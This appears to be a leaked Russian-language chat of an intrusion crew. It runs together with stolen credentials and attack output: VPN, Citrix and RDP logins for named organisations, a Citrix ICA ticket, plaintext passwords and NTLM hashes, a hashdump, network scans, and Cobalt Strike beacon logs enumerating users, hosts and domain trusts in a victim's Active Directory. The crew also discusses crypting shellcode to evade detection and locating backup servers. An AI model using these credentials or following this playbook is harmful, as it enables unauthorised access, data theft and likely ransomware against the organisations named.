FH*(UG&$*WFH&*efu
``Что делать далеето есть?Какой план?сейчас выдам тулчейнпонялты имешь ввиду цитрикс ресивер?
просто я тоже как бы подключился но потом дедик улетел@user9 а у тебя в чем проблема? я подключился к впнувин 2012``
206.221.176.24:37345
Administrator:V86Rk1Dd6Ck1yqThbD6Dh8Cg0Z8iLiiY
```горячая заменаотписали в дцпо дедику давсе еще не доступена шо там дедик еще починили?аналоги run?paloca.cernerworks.comзакрыт, пробовал по ehkдомен admin.sisd.k12ну сейчас дэдик заработает и попробую или когда у коллег освободится попробуюрдп?такая же ситуацияУ меня не запустить cmd and powerShell закрыто админом, файл не залить.у тебя конфа какая?потом уже lpe и т док))если забыли: AD INFO, LA, DA, EA, DCнет, все по алгоритмуну я в системе, дальше как обычно? или какие то другие вводные?не понял вопросамы разрабатываем всю сетку, в смысле АД снимать?ну и поока дедик не доступен все ещея залогиненне, я прост чет не понимаю
там все, в этой ссылке, ведет тупо в админки сайтов[ ](https://mediaeveryone.com/channel/general?msg=TPa6bFNG43pgJ65BY) ты тут залогинен? или пользак зашел?```
https://connect.mch1.org/vpn/index.html lpsmpep2 vk2Lazu4
```
@user8 заменаотпиши в конфутутачки@user8 у нас где?окмбщас его ребутнут и притяните его в кобу на всякиймб ушел за впн такитак жено после запуска я в нем поработал минут 10 ещеплагин цитрикса вы на нем впн не запускали случаем?)да, чет он поработает пару минут и потом 15 не доступенпоходу дэдик полность сдох (199.241.188.186)``
https://mydesktop.sisd.net/vpn/index.html jeksae happiness3
```
@user4 заменану цитрикс ресивер что то вроде пробрасывает
а так нетвход в сеть?[ ](https://mediaeveryone.com/channel/general?msg=9uCLqBtxTJHonFyfv) дедик чет отваливается,но
я там полазил - все ведет в админки сайтов`
JE*SG&Y*FwEYHIf7g8we
```+дадокинуть?но там детект рейт вышеесть варик крипта шелкода в ехетолько шелкод в дллнеа?@tl1 есть делка для крипта exe``
https://liveopsnation.okta.com/app/citrixnetscalergateway_saml/exk25j1wbvpyk8bfl2p7/sso/saml jgarcia693@aol.com Thebear#1
```
@user9 замена@user3 замена``
https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76!
```передай пока дедик @user8видимо акк залогинени после этого из общего списка исчезает аккЕсли делать через прилождение то отдает ```
your changes could not be served due to an invalid configuration of the account PROD
``вызывая через него окошко с приложениемпривет)Привет.ica файл это фай который citrix receiver'ом открываетсяагатебе надо поставить цитрикс ресивер который этот файл будет открыватьУ меня куда не ткни отдает файл ```
[Encoding]
InputEncoding=UTF8

[WFClient]
ProxyFavorIEConnectionSetting=Yes
ProxyTimeout=30000
ProxyType=Auto
ProxyUseFQDN=Off
RemoveICAFile=yes
TransparentKeyPassthrough=Local
TransportReconnectEnabled=Off
Version=2
VirtualCOMPortEmulation=On

[ApplicationServers]
Report Request Maintenance Prod=

[Report Request Maintenance Prod]
Address=;40;STA664590668;2023A7A9232D60230A425A54DEFFA6
AutologonAllowed=ON
BrowserProtocol=HTTPonTCP
CGPSecurityTicket=On
ClearPassword=53F80104235331
ClientAudio=On
DesiredColor=8
DesiredHRES=0
DesiredVRES=0
Domain=\6AA387C7B8517C82
DoNotUseDefaultCSL=On
EncryptionLevelSession=EncRC5-128
FontSmoothingType=0
HDXoverUDP=Off
HTTPBrowserAddress=!
InitialProgram=#Report Request Maintenance Prod
Launcher=WI
LaunchReference=558DD381B14D807B6BEEDE6BACFB10
LocHttpBrowserAddress=!
LogonTicket=53F801042353316AA387C7B8517C82
LogonTicketType=CTXS1
LongCommandLine=
LPWD=156
NRWD=93
ProxyTimeout=30000
ProxyType=Auto
SecureChannelProtocol=Detect
SessionsharingKey=SHNGKRJyAVxk+e5emFlorzKJwYLVSQhb
SFRAllowed=Off
SSLCiphers=all
SSLEnable=On
SSLProxyHost=ag2.cernerworks.com:443
startSCD=1606819909507
Title=Report Request Maintenance Prod
TransportDriver=TCP/IP
TRWD=0
TWIMode=On
WinStationDriver=ICA 3.0

[Compress]
DriverNameWin16=pdcompw.dll
DriverNameWin32=pdcompn.dll

[EncRC5-0]
DriverNameWin16=pdc0w.dll
DriverNameWin32=pdc0n.dll

[EncRC5-128]
DriverNameWin16=pdc128w.dll
DriverNameWin32=pdc128n.dll

[EncRC5-40]
DriverNameWin16=pdc40w.dll
DriverNameWin32=pdc40n.dll

[EncRC5-56]
DriverNameWin16=pdc56w.dll
DriverNameWin32=pdc56n.dll


``все кербы в личку @tl2а, все)или medimizer к user4 относится?``
https://login.medimizer.net/rdweb/pages/en-us/login.aspx bill@biomedtechs.com 2003Proline
```да, я потом изменил сообщение на medimizerтам просто 2 учетки было@user9 ты взял доступ от @user4 у него домен `mysystems4pt.com``https://apps.oasispetroleum.com/vpn/index.html bmolinaro b5ab80fbd9E!`[ ](https://mediaeveryone.com/channel/general?msg=gekDndf3GK77gi9qR) +``
https://login.medimizer.net/rdweb/pages/en-us/login.aspx bill@biomedtechs.com 2003Proline
```забрад https://paloca.cernerworks.com/citrix/prodweb/ dr14349773``
https://portal.mysystems4pt.com/vpn/index.html PWilliams061 Signal061relent
```создаю конфу добавляю васразбираем и пишем кто забралдоступы валидны5 штук``
https://paloca.cernerworks.com/citrix/prodweb/ dr14349773
``````
https://citrix.sharecare.com/vpn/index.html ad.alex.whittier Ph@nt0m01Beatz87
```а и еще тут будут рдп``
https://login.medimizer.net/rdweb/pages/en-us/login.aspx office@biomedtechs.com Bmt5510shoP
https://login.medimizer.net/rdweb/pages/en-us/login.aspx bill@biomedtechs.com 2003Proline
``````
https://portal.mysystems4pt.com/vpn/index.html PWilliams061 Signal061relent
``````
https://apps.oasispetroleum.com/vpn/index.html bmolinaro b5ab80fbd9E!
``ессесноеще помните как это делается?)разбираем и в работу вас есть 2 дедика для работы с впнами + цитрыиз масштаба работ, я выдаю вам список цитр + впныокей, пока будет в запасекудаДа не, просто никому надоrelfвсе, все пропаликто-то хочет еще одну новую кобу?билдер шелкода``
spidfhoUSDFHI&SEUHFIjoaPS;ddsijghf
```в лс кобау менятак, у кого тогда остался инактив?долго живут однако)можете взять 1 чистую кто хочетзначит 4 рабочихну зайти то зашёланет, если к кобе не коннектит значит инактивправильно?то коба инактивесли у меня сессий активных нетя недопонялтак-си как раз у 2х инактив3 кобы значит рабочиеагаип домена со скобками в гугледав запрос так как ты написал, со скобками23.106.160.86 инфы нетипип домена или ип кобы проверяли?)поэтому щас узнаем сколько у нас есть рабочих коб и распределим текущие 2моя вроде чистаяу меня есть 2 чистые кобыесли есть инфа что ип помечен как кб значит кобу в сносв поиск 123[.]123[.]123засветился ли он как кобаль страйкте у кого коба активная проверьте ип домена в гугле на детектывыдам свежий даКриптор есть?активнаяsimvp.comкто-то один не отписал по кобе)у остальных не было коб?``
likenic.com
104.243.40.126:38542
```
не активу меня `85.150.190.113:61718` активна (она из последних, которые давали)остальные?моя инактив
```
https://ezvol.com
-
209.222.101.55:38350
```Сессии с лабы прилетаютулкит будет ближе к 15:00 свежий билд, его выдаст @tl2, соотв с нас со всех фидбэк по работеraills.comактивн/не активскажите мне ваши старые кобычто по тул киту и по кобам, в плане работаем в старых или новые будут?мин 10 на орг вопросы и потом непосредственно работаНу чтож еще раз всем привет, давненько мы с вами не общалисьтеперь 5)5)всего 4?на месте всеhiЖдем и начинаем)Добрый день:space_invader:привет\Всем добрый день``
Windows IP Configuration

   Host Name . . . . . . . . . . . . : UKHECSLT3028
   Primary Dns Suffix . . . . . . . : matches.com
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : matches.com
                                       Home

Ethernet adapter Ethernet:

   Media State. . . . . . . . . . . : Media disconnected
   Connection-specific DNS suffix :
   Description . . . . . . . . . . . : Intel(R) Ethernet Connection (6) I219-V
   Physical Address. . . . . . . . . : E8-D8-D1-F3-F7-7E
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Wireless LAN adapter Local Area Connection* 1:

   Media State. . . . . . . . . . . : Media disconnected
   Connection-specific DNS suffix :
   Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter
   Physical Address. . . . . . . . . : 60-F2-62-90-AE-62
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Wireless LAN adapter Local Area Connection* 2:

   Media State. . . . . . . . . . . : Media disconnected
   Connection-specific DNS suffix :
   Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter #2
   Physical Address. . . . . . . . . : 62-F2-62-90-AE-61
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Ethernet 2:

   Media State. . . . . . . . . . . : Media disconnected
   Connection-specific DNS suffix :
   Description . . . . . . . . . . . : Fortinet Virtual Ethernet Adapter (NDIS 6.30)
   Physical Address. . . . . . . . . : 00-09-0F-FE-00-01
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Wireless LAN adapter WiFi:

   Connection-specific DNS Suffix :
   Description . . . . . . . . . . . : Intel(R) Wi-Fi 6 AX200 160MHz
   Physical Address. . . . . . . . . : 3E-5E-B9-EB-F9-F8
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : 2a02:c7f:d417:c000:fcae:695d:8216:8644(Preferred)
   IPv6 Address. . . . . . . . . . . : fda8:e756:3c36:0:fcae:695d:8216:8644(Preferred)
   Temporary IPv6 Address. . . . . . : 2a02:c7f:d417:c000:848b:70e:a51c:a5c3(Preferred)
   Temporary IPv6 Address. . . . . . : fda8:e756:3c36:0:6806:3a52:eadd:8175(Preferred)
   Link-local IPv6 Address . . . . . : fe80::fcae:695d:8216:8644%10(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.0.16(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Lease Obtained. . . . . . . . . . : 21 September 2020 17:20:50
   Lease Expires . . . . . . . . . . : 23 September 2020 13:55:43
   Default Gateway . . . . . . . fe80::3e89:94ff:fe6e:1249%10
                                       192.168.0.1
   DHCP Server . . . . . . . . . . . : 192.168.0.1
   DHCPv6 IAID . . . . . . . . . . : 174125666
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-FB-F4-0B-E8-D8-D1-F3-F7-7E
   DNS Servers . . . . . . . . . . . : fda8:e756:3c36:0:3e89:94ff:fe6e:1248
   NetBIOS over Tcpip. . . . . . . . : Enabled

Ethernet adapter Bluetooth Network Connection:

   Media State. . . . . . . . . . . : Media disconnected
   Connection-specific DNS suffix :
   Description . . . . . . . . . . . : Bluetooth Device (Personal Area Network)
   Physical Address. . . . . . . . . : 60-F2-62-90-AE-65
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Connection-specific DNS Suffix :
   Description . . . . . . . . . . . : Microsoft Teredo Tunneling Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : 2001:0:2851:7ae4:2036:bad:a1f9:8e7c(Preferred)
   Link-local IPv6 Address . . . . . : fe80::2036:bad:a1f9:8e7c%11(Preferred)
   Default Gateway . . . . . . . . :
   NetBIOS over Tcpip. . . . . . . . : Disabled

``````
(ARP) Target '192.168.0.16' is alive. 3E-5E-B9-EB-F9-F8
(ARP) Target '192.168.0.1' is alive. 3C-89-94-6E-12-49
(ARP) Target '192.168.0.26' is alive. BC-A5-11-97-4D-A1
(ARP) Target '192.168.0.12' is alive. (ARP) Target '192.168.0.3' is alive. (ARP) Target '192.168.0.23' is alive. 02(ARP) Target '192.168.0.2' is alive. AC(ARP) Target '192.168.0.4' is alive. (ARP) Target '192.168.0.8' is alive.
(ARP) Target '192.168.0.6' is alive. B0-68-E6-1D-DC-8F
(ARP) Target '192.168.0.18' is alive. F0-99-B6-26-91-33
(ARP) Target '192.168.0.9' is alive. 0C-B2-B7-1C-9C-9B
(ARP) Target '192.168.0.7' is alive. 02-0F-B5-81-CD-E1
(ARP) Target '192.168.0.17' is alive. BC-92-6B-7A-D8-BF
(ARP) Target '192.168.0.10' is alive. (ARP) Target '192.168.0.13' is alive. C098--3801--96A7--6492--6437--DC83
(ARP) Target '192.168.0.128' is alive. 02-0F-B5-0B-15-44
192.168.0.10:631
192.168.0.10:515
192.168.0.10:443
192.168.0.10:23
192.168.0.10:80
192.168.0.10:21 (220 FTP print service:V-1.13/Use the network password for the ID if updating.)
192.168.0.7:5000
192.168.0.7:53
192.168.0.7:80
192.168.0.8:80
192.168.0.16:5040
192.168.0.16:3389
192.168.0.16:999
192.168.0.16:443
192.168.0.1:5431
192.168.0.16:139
192.168.0.16:135
192.168.0.16:80
192.168.0.1:5300
192.168.0.1:443
192.168.0.1:80
192.168.0.1:53
192.168.0.16:445 (platform: 500 version: 10.0 name: UKHECSLT3028 domain: MATCHES)
``впн не подключен видимо``
domain: UKHECSLT3028
Login: Administrator
Password: 192837465S!
NTLM: f490c4823837a7d002e0176f3c5203ad


Domain: MATCHES
Login: mercedesd
Password: Dinham2323
NTLM: 7c839aa54221edb65e959f18ab9bde41
````hashdump`
```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f490c4823837a7d002e0176f3c5203ad:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1a20cb05b4b6db77e592dee4e974e4d9:::
``AdFind дохнет на локальном админе, под другими пользователями вобще не отрабатывает
```
[*] Tasked beacon to run: C:\Users\Administrator\AdFind.exe -f "(objectcategory=person)" > ad_users.txt
[+] host called home, sent: 108 bytes
[+] received output:

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x51 (81) - Server Down
Terminating program.

``````
beacon> shell net localgroup "Administrators"
[*] Tasked beacon to run: net localgroup "Administrators"
[+] host called home, sent: 62 bytes
[+] received output:
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
MATCHES\domain admins
MATCHES\sec_WorkstationLocalAdmin
The command completed successfully.

```у всех>operatingSystem: Windows Server 2012 R2 Standardбля не так прочитал[ ](https://mediaeveryone.com/group/saiglobal-com?msg=k7PCBz9uHZfYGa3QG) да, я это взял из описания в ad_comp``
beacon> shell tasklist /s 10.225.10.53 /v
[*] Tasked beacon to run: tasklist /s 10.225.10.53 /v
[+] host called home, sent: 58 bytes
[+] received output:

Image Name PID Session Name Session# Mem Usage User Name CPU Time
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Services 0 4 K NT AUTHORITY\SYSTEM 830:25:19
System 4 Services 0 276 K N/A 0:40:04
smss.exe 236 Services 0 1,036 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 332 Services 0 4,020 K NT AUTHORITY\SYSTEM 0:00:44
wininit.exe 388 Services 0 3,892 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 396 Console 1 3,576 K NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 440 Console 1 5,904 K NT AUTHORITY\SYSTEM 0:00:00
services.exe 484 Services 0 10,748 K NT AUTHORITY\SYSTEM 1:35:33
lsass.exe 492 Services 0 17,544 K NT AUTHORITY\SYSTEM 0:06:05
svchost.exe 556 Services 0 11,484 K NT AUTHORITY\SYSTEM 0:01:11
svchost.exe 600 Services 0 9,812 K NT AUTHORITY\NETWORK SERVICE 0:12:19
LogonUI.exe 684 Console 1 24,144 K NT AUTHORITY\SYSTEM 0:00:00
MsMpEng.exe 696 Services 0 175,280 K NT AUTHORITY\SYSTEM 1:37:48
dwm.exe 704 Console 1 22,012 K Window Manager\DWM-1 0:00:00
svchost.exe 808 Services 0 17,876 K NT AUTHORITY\LOCAL SERVICE 0:14:12
svchost.exe 848 Services 0 15,752 K NT AUTHORITY\SYSTEM 0:00:37
svchost.exe 868 Services 0 61,204 K NT AUTHORITY\SYSTEM 2:42:51
svchost.exe 920 Services 0 14,020 K NT AUTHORITY\LOCAL SERVICE 0:00:26
svchost.exe 1000 Services 0 21,656 K NT AUTHORITY\NETWORK SERVICE 0:05:03
svchost.exe 584 Services 0 11,044 K NT AUTHORITY\LOCAL SERVICE 0:00:39
spoolsv.exe 1132 Services 0 13,264 K NT AUTHORITY\SYSTEM 0:00:11
svchost.exe 1168 Services 0 7,832 K NT AUTHORITY\SYSTEM 0:00:05
ir_agent.exe 1188 Services 0 13,808 K NT AUTHORITY\SYSTEM 0:01:04
conhost.exe 1300 Services 0 3,024 K NT AUTHORITY\SYSTEM 0:00:01
newrelic-infra.exe 1308 Services 0 26,188 K NT AUTHORITY\SYSTEM 5:46:01
ir_agent.exe 1324 Services 0 66,396 K NT AUTHORITY\SYSTEM 1:05:42
snmp.exe 1400 Services 0 6,988 K NT AUTHORITY\SYSTEM 0:02:56
svchost.exe 1416 Services 0 15,644 K NT AUTHORITY\SYSTEM 0:01:38
svchost.exe 1440 Services 0 13,916 K NT AUTHORITY\SYSTEM 0:00:39
vmtoolsd.exe 1472 Services 0 13,900 K NT AUTHORITY\SYSTEM 0:09:48
WmiApSrv.exe 1572 Services 0 8,292 K NT AUTHORITY\SYSTEM 0:01:02
wmi_exporter.exe 1656 Services 0 15,924 K NT AUTHORITY\SYSTEM 0:00:34
WmiPrvSE.exe 1764 Services 0 40,132 K NT AUTHORITY\SYSTEM 0:37:12
WmiPrvSE.exe 1784 Services 0 24,328 K NT AUTHORITY\NETWORK SERVICE 4:11:00
svchost.exe 1536 Services 0 67,976 K NT AUTHORITY\NETWORK SERVICE 0:01:17
svchost.exe 2156 Services 0 4,808 K NT AUTHORITY\NETWORK SERVICE 0:00:03
dllhost.exe 2300 Services 0 10,956 K NT AUTHORITY\SYSTEM 0:00:04
msdtc.exe 2496 Services 0 7,384 K NT AUTHORITY\NETWORK SERVICE 0:00:03
WmiPrvSE.exe 2820 Services 0 10,876 K NT AUTHORITY\LOCAL SERVICE 0:23:58
CcmExec.exe 3364 Services 0 118,580 K NT AUTHORITY\SYSTEM 0:12:01
WmiPrvSE.exe 3396 Services 0 26,704 K NT AUTHORITY\SYSTEM 0:00:36
WmiPrvSE.exe 3644 Services 0 30,296 K NT AUTHORITY\SYSTEM 0:18:55
WmiPrvSE.exe 3752 Services 0 10,024 K NT AUTHORITY\LOCAL SERVICE 0:02:27
WmiPrvSE.exe 552 Services 0 6,632 K NT AUTHORITY\LOCAL SERVICE 0:00:01
CmRcService.exe 2088 Services 0 8,784 K NT AUTHORITY\SYSTEM 0:00:09
ir_agent.exe 3136 Services 0 100,072 K NT AUTHORITY\SYSTEM 0:43:25
ir_agent.exe 244 Services 0 63,524 K NT AUTHORITY\SYSTEM 0:25:59
ir_agent.exe 3260 Services 0 47,284 K NT AUTHORITY\SYSTEM 0:05:57
csrss.exe 2252 RDP-Tcp#0 2 14,128 K NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 1068 RDP-Tcp#0 2 5,292 K NT AUTHORITY\SYSTEM 0:00:00
dwm.exe 2216 RDP-Tcp#0 2 39,120 K Window Manager\DWM-2 0:00:04
taskhostex.exe 3388 RDP-Tcp#0 2 6,520 K DATACENTER\adm.cotral0 0:00:00
rdpclip.exe 2268 RDP-Tcp#0 2 6,908 K DATACENTER\adm.cotral0 0:00:00
explorer.exe 1716 RDP-Tcp#0 2 99,236 K DATACENTER\adm.cotral0 0:00:20
WmiPrvSE.exe 2068 Services 0 15,960 K NT AUTHORITY\SYSTEM 0:00:22
vmtoolsd.exe 2916 RDP-Tcp#0 2 12,688 K DATACENTER\adm.cotral0 0:03:14
msseces.exe 2116 RDP-Tcp#0 2 13,852 K DATACENTER\adm.cotral0 0:00:00
SCNotification.exe 1100 RDP-Tcp#0 2 40,204 K DATACENTER\adm.cotral0 0:00:06
xagt.exe 2064 Services 0 7,516 K NT AUTHORITY\SYSTEM 0:00:01
xagtnotif.exe 3276 RDP-Tcp#0 2 6,520 K DATACENTER\adm.cotral0 0:00:00
ir_agent.exe 1208 Services 0 51,040 K NT AUTHORITY\SYSTEM 0:00:06
ir_agent.exe 3624 Services 0 49,988 K NT AUTHORITY\SYSTEM 0:00:06

```что в operation system в ад написано у них?UAT это вряд ли НАС ))))процессы посмотрите ещепинг -> shell dir \\223145483475843\C$
?```
Предположительно насы:
>description: C360 Client Files
	USHDC1-CSPFPS03.datacenter.local
	USHDC1-CSPFPS12.datacenter.local
	USHDC1-CSPFPS08.datacenter.local
	USHDC1-CSPFPS02.datacenter.local
	USHDC1-CSPFPS04.datacenter.local
	USHDC1-CSPFPS14.datacenter.local
	USHDC1-CSPFPS13.datacenter.local
	USHDC1-CSPFPS10.datacenter.local
	USHDC1-CSPFPS01.datacenter.local
	USHDC1-CSPFPS09.datacenter.local
	USHDC1-CSPFPS11.datacenter.local
	USHDC1-CSPFPS06.datacenter.local
	USHDC1-CSPFPS05.datacenter.local
	USHDC1-CSPFPS07.datacenter.local
>description: C360 UAT File Servers
	USHDC1-CSQFPS01.datacenter.local
	USHDC1-CSQFPS02.datacenter.local
```14 клиентских
2 UATвсе SSOможно не притягивать дажепритянуть и полазить там?а они все фс?осмотреть[ ](https://mediaeveryone.com/group/saiglobal-com?msg=6LW23aHAC5BNgtnSZ) ты имешь ввиду то, что я скинул выше?файловые серверы можете осмотреть ещесли в этом домене пока ничего нет под бэкап, ищем виртуализацию)ну я вроде датацентр разбираюв других доменах тоже нет ничего разве?```
user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct08 02:29:22> net view
[*] Tasked beacon to run net view
[+] host called home, sent: 104504 bytes
[+] received output:
List of hosts:

 Server Name IP Address Platform Version Type Comment
 ----------- ---------- -------- ------- ---- -------
 APP01 10.195.25.144 500 5.2 PDC

[+] received output:
 APP02 10.195.25.147 500 5.2
 AUHDC1-COPADS01 10.195.25.50 500 6.3 PDC
 AUHDC1-COPADS02 10.195.25.49 500 6.3 BDC
 AUHDC1-COPADS04 10.195.25.35 500 6.3 BDC
 AUHDC1-COPADS05 10.195.25.43 500 10.0 BDC
 AUHDC1-COPAPP08 10.195.25.20 500 6.3
 AUHDC1-COPFPS01 10.195.25.115 500 6.3
 AUHDC1-COPFPS02 10.195.25.3 500 6.3
 AUHDC1-COPFPS03 10.195.25.54 500 10.0
 AUHDC1-COPSCM01 10.195.25.210 500 6.3
 AUHDC1-COPSCM02 10.195.25.211 500 6.3
 AUHDC1-COPSCM04 10.195.25.218 500 6.3
 AUHDC1-COPSQL01 10.195.25.212 500 6.3
 AUHDC1-COPSQL02 10.195.25.213 500 6.3
 AUHDC1-COPSQL11 10.195.25.125 500 6.3
 AUHDC1-COQSQL06 10.195.25.36 500 6.3
 AUSYDE95X-SON2 10.195.25.184 500 6.0
 AUSYDHC-APP006 10.195.25.84 500 4.0
 AUSYDHC-APP016 10.195.25.76 500 5.2
 AUSYDHC-APP025 10.195.25.175 500 5.2
 AUSYDHC-APP027 10.195.25.94 500 6.0
 AUSYDHC-COPMG05 10.195.25.242 500 6.1
 AUSYDHC-CS-APP1 10.195.25.114 500 5.2
 AUSYDHC-CS-MOS1 10.195.25.63 500 5.2
 AUSYDHC-CSPSQ01 10.195.25.214 500 6.1
 AUSYDHC-EPPCON1 10.195.25.235 500 6.0
 AUSYDHC-EPPPS1 10.195.25.52 500 10.0
 AUSYDHC-EPPREP1 10.195.25.225 500 6.0
 AUSYDHC-EPPREP2 10.195.25.226 500 6.0
 AUSYDHC-EPPSON1 10.195.25.238 500 6.0
 AUSYDHC-LDS1 10.195.25.62 500 6.0
 AUSYDHC-SQL16 10.195.25.178 500 6.1
 AUSYDHQ-FS1 10.195.25.3 500 6.3
 AUSYDHQ-FS1TEST 10.195.25.3 500 6.3
```>description: C360 UAT File Servers>description: C360 Client Filesа net view не прокатит ?NAS
Backup
Veeam
нетуагавиим - Veeam?в именах хостов нет каких-то ключевых слов указывающих на НАС, бэкап, вим и т д?а как их выцепить?зачем?тогда portscan 21 22 ?они могут быть виндовыесли в ad_comp нет линуксов, значит насов тоже нет? :thinking:но я думаю что еще минимум 2-3 шт получится открытьт не будет 100% покрытия и часть доменов не будет видна ни откудакаждый домен может видеть часть трастов которые изначально не видно быловот у вас в общем списке 19шт было изначальноугуdatacenter.local
```
    0: SAIG saig.frd.global (Direct Outbound) (Direct Inbound)
    1: FRD frd.global (Direct Outbound) (Direct Inbound)
    2: DATACENTER datacenter.local (Forest tree root) (Primary Domain) (Native)
``вот еще снимите как раз из текущего где @user8`saig.frd.global`которые в АДвот в этом saiglobal.com
у него в трастах было 2 датацентра[ ](https://mediaeveryone.com/group/saiglobal-com?msg=t7mimJ5JXQBP2Qbrf) подпиши плиз из какого доменазначит один домен видит часть трастов из общего списка который не видит другие``
    0: 80-20 80-20.com (Direct Outbound) (Direct Inbound)
    1: LEGALCO legalco.local (Direct Outbound) (Direct Inbound)
    2: FRD frd.global (Forest tree root) (Direct Outbound) (Direct Inbound)
    3: ANSTAT Anstat.local (Direct Outbound) (Direct Inbound)
    4: LEADERS leaders.frd.global
    5: AUST standards.com.au (Direct Outbound) (Direct Inbound)
    6: SAIGPROD SaigProd.local (Direct Outbound) (Direct Inbound)
    7: C360 c360.local (Direct Outbound) (Direct Inbound)
    8: DATACENTER datacenter.local (Direct Outbound) (Direct Inbound)
    9: C360UK c360uk.local (Direct Outbound) (Direct Inbound)
    10: SAIG saig.frd.global (Forest 2) (Primary Domain) (Native)
``они не 1 в 1между разными доменами где сессии висятсравни просто net domain_trustsайпишник один и тот же1 из в карантинетам трастах 2 датацентра точноне поняля как минимум замечал разные между frd.global и saig...., datacenter...в трасты потом все равно лезть придетсяок пока доделывай остальное по домену-[ ](https://mediaeveryone.com/group/saiglobal-com?msg=BxbusgHiy84BsvA2G) трастыновыми в плане прям новыми или трастами от этого?10 - 0% лосс``
Web Server - 25
```
а есть другие сервера этой категории которые отвечают на пинг корректно ?ты так и не занимался новыми доменами?крепинг завтра сделать можно будет или еще поискать вариантыкинь пока в 100% lossв датацентрес дка ты откуда пингуешь кст?=> рдс и ссо в дизейбл, веб оставляю?к тому же это в 1 доменевеб не особо критичные я думаю100% лоссштукRDS - 2
Web Server - 25
SSO - 1категорииназначение?что подразумевается под "критичные "28критичные?много таких?серваки с 100% loss тоже в Disabled?прально)и теперь пинговать все, чтобы узнать какие ещё отрублены :sunglasses:агав Disabled Servers закину тогда?``
beacon> shell ping USHDC1-CSPSPH01.datacenter.local
[*] Tasked beacon to run: ping USHDC1-CSPSPH01.datacenter.local
[+] host called home, sent: 68 bytes
[+] received output:
Ping request could not find host USHDC1-CSPSPH01.datacenter.local. Please check the name and try again.

beacon> shell ping USHDC1-CSPSPH02.datacenter.local
[*] Tasked beacon to run: ping USHDC1-CSPSPH02.datacenter.local
[+] host called home, sent: 68 bytes
[+] received output:
Ping request could not find host USHDC1-CSPSPH02.datacenter.local. Please check the name and try again.
```
Это вот эти последниеOU=C360 - SSO сервера с разными сервисами аутлучными я полагаю
OU=SCCM - SCCM серваки
последний не знаю...``
CN=USHDC1-CSPFPS03,OR=Production,OR=C360,OR=Servers,OR=0.SAI Global,DC=datacenter,DC=local

>dNSHostName: USHDC1-CSPFPS03.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-CSPFPS03
>servicePrincipalName: CmRcService/USHDC1-CSPFPS03.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-CSPFPS03
>servicePrincipalName: WSMAN/USHDC1-CSPFPS03.datacenter.local
>servicePrincipalName: TERMSRV/USHDC1-CSPFPS03
>servicePrincipalName: TERMSRV/USHDC1-CSPFPS03.datacenter.local
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPFPS03
>servicePrincipalName: HOST/USHDC1-CSPFPS03
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPFPS03.datacenter.local
>servicePrincipalName: HOST/USHDC1-CSPFPS03.datacenter.local
```
```
CN=USHDC1-CSPMGW02,OR=Production,OR=C360,OR=Servers,OR=0.SAI Global,DC=datacenter,DC=local

>dNSHostName: USHDC1-CSPMGW02.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-CSPMGW02.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-CSPMGW02
>servicePrincipalName: CmRcService/USHDC1-CSPMGW02.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-CSPMGW02
>servicePrincipalName: TERMSRV/USHDC1-CSPMGW02.datacenter.local
>servicePrincipalName: TERMSRV/USHDC1-CSPMGW02
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPMGW02
>servicePrincipalName: HOST/USHDC1-CSPMGW02
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPMGW02.datacenter.local
>servicePrincipalName: HOST/USHDC1-CSPMGW02.datacenter.local
```

```
CN=USHDC1-CSPAPP23,OR=Production,OR=C360,OR=Servers,OR=0.SAI Global,DC=datacenter,DC=local

>dNSHostName: USHDC1-CSPAPP23.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-CSPAPP23
>servicePrincipalName: CmRcService/USHDC1-CSPAPP23.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-CSPAPP23
>servicePrincipalName: WSMAN/USHDC1-CSPAPP23.datacenter.local
>servicePrincipalName: TERMSRV/USHDC1-CSPAPP23
